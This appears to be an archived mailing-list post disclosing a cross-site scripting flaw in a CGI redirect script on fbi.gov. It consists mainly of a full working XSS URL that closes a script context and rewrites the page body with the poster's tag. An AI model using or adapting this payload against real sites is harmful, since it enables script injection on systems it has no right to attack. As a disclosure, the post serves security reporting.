<<< Date Index >>>     <<< Thread Index >>>

FBI XSS Vulnerability



by : Matrix (S.B)

Ok it is not the first time, but they had fixed them all. It will probably be 
the third or fourth time they try to address this damn cgi! Here is the XSS 
that Matrix submitted to Securityfocus (works only in Internet Explorer):
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'Matrix(S.B)'</script>